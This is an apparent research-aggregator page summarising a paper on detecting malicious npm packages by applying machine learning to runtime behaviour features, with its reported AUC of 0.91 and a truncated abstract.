Towards Classifying Benign And Malicious Packages Using Machine Learning
Thanh-Cong Nguyen, Ngoc-Thanh Nguyen, Van-Giau Ung, Duc-Ly Vu

TL;DR
This paper presents a machine learning-based method to classify open-source packages as benign or malicious by analyzing runtime behaviors, achieving high accuracy with an AUC of 0.91 on npm packages.
Contribution
It introduces a novel approach that uses dynamic analysis features combined with machine learning for automatic malicious package detection.
Findings
Achieved an AUC of 0.91 in classification accuracy.
False positive rate nearly 0%.
Effective differentiation between benign and malicious packages.
Abstract
Recently, the number of malicious open-source packages in package repositories has been increasing dramatically. While major security scanners focus on identifying known Common Vulnerabilities and Exposures (CVEs) in open-source packages, there are very few studies on detecting malicious packages. Malicious open-source package detection typically requires static, dynamic analysis, or both. Dynamic analysis is more effective as it can expose a package's behaviors at runtime. However, current dynamic analysis tools (e.g., ossf's package-analysis) lack an automatic method to differentiate malicious packages from benign packages. In this paper, we propose an approach to extract the features from dynamic analysis (e.g., executed commands) and leverage machine learning techniques to automatically classify packages as benign or malicious. Our evaluation of nearly 2000 packages on npm shows…
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
Taxonomy
TopicsPhysical Unclonable Functions (PUFs) and Hardware Security · Advanced Malware Detection Techniques · Security and Verification in Computing
